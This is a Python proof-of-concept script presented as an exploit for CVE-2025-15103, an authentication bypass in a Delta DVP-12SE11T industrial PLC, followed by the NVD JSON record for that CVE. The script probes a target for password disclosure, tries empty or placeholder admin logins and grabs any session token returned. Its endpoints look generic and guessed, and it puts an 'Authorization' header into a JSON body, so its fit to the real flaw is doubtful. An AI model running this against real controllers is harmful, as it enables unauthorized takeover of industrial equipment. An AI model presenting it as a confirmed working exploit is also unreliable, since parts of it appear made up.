CVE-2025-15103

#!/usr/bin/env python3 """ CVE-2025-15103 PoC - Delta DVP-12SE11T Authentication Bypass This PoC demonstrates the authentication bypass vulnerability in Delta DVP-12SE11T PLC devices. Note: This code is for educational and authorized security testing purposes only. """ import requests import sys import json def exploit_auth_bypass(target_ip, target_port=80): """ Attempt to exploit CVE-2025-15103 authentication bypass vulnerability. Args: target_ip: Target device IP address target_port: Target device port (default: 80) Returns: dict: Exploitation result with status and details """ result = { 'vulnerability': 'CVE-2025-15103', 'target': f'{target_ip}:{target_port}', 'status': 'unknown', 'details': {} } base_url = f'http://{target_ip}:{target_port}' # Step 1: Information gathering - enumerate accessible endpoints endpoints = [ '/api/system/info', '/api/auth/login', '/api/config/password', '/cgi-bin/login.cgi', '/api/user/list' ] print(f"[*] Starting CVE-2025-15103 exploitation on {target_ip}:{target_port}") for endpoint in endpoints: try: response = requests.get(f'{base_url}{endpoint}', timeout=5) if response.status_code == 200: print(f"[+] Endpoint {endpoint} accessible - Status: {response.status_code}") # Step 2: Check for password disclosure in response if 'password' in response.text.lower() or 'pwd' in response.text.lower(): print(f"[!] Potential password information found at {endpoint}") result['details']['password_disclosure_endpoint'] = endpoint result['details']['response_preview'] = response.text[:500] except requests.exceptions.RequestException as e: print(f"[-] Error accessing {endpoint}: {str(e)}") # Step 3: Attempt authentication bypass with partial credentials bypass_payloads = [ {'username': 'admin', 'password': ''}, {'username': 'admin', 'password': 'partial_credential'}, {'Authorization': 'Basic YWRtaW46'} ] print("[*] Attempting authentication bypass techniques...") for i, payload in enumerate(bypass_payloads, 1): try: response = requests.post( f'{base_url}/api/auth/login', json=payload, headers={'Content-Type': 'application/json'}, timeout=5 ) if response.status_code == 200 and 'token' in response.text: print(f"[!] Authentication bypass successful with payload {i}") result['status'] = 'vulnerable' result['details']['bypass_method'] = f'Payload {i}' result['details']['session_token'] = response.json().get('token', 'N/A') return result except Exception as e: print(f"[-] Bypass attempt {i} failed: {str(e)}") result['status'] = 'not_vulnerable_or_protected' return result def main(): if len(sys.argv) < 2: print("Usage: python cve_2025_15103_poc.py <target_ip> [port]") print("Example: python cve_2025_15103_poc.py 192.168.1.100 80") sys.exit(1) target_ip = sys.argv[1] target_port = int(sys.argv[2]) if len(sys.argv) > 2 else 80 result = exploit_auth_bypass(target_ip, target_port) print("\n[*] Exploitation complete. Result:") print(json.dumps(result, indent=2)) if __name__ == '__main__': main()

{"cve": {"id": "CVE-2025-15103", "sourceIdentifier": "759f5e80-c8e1-4224-bead-956d7b33c98b", "published": "2025-12-30T09:15:52.463", "lastModified": "2026-01-06T21:04:54.880", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "DVP-12SE11T - Authentication Bypass via Partial Password Disclosure"}], "metrics": {"cvssMetricV31": [{"source": "759f5e80-c8e1-4224-bead-956d7b33c98b", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "baseScore": 8.1, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "HIGH", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.2, "impactScore": 5.9}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "baseScore": 9.8, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 5.9}]}, "weaknesses": [{"source": "759f5e80-c8e1-4224-bead-956d7b33c98b", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-200"}]}], "configurations": [{"operator": "AND", "nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:deltaww:dvp-12se11t_firmware:*:*:*:*:*:*:*:*", "versionEndExcluding": "2.16", "matchCriteriaId": "0C3C10A0-095C-42AE-BDC7-031777E1D92B"}]}, {"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": false, "criteria": "cpe:2.3:h:deltaww:dvp-12se11t:-:*:*:*:*:*:*:*", "matchCriteriaId": "8064F0CC-BFDB-4E4B-8E20-437BA4663972"}]}]}], "references": [{"url": "https://filecenter.deltaww.com/news/download/doc/Delta-PCSA-2025-00022_DVP-12SE11T%20Multiple%20Vulnerabilities.pdf", "source": "759f5e80-c8e1-4224-bead-956d7b33c98b", "tags": ["Vendor Advisory"]}]}}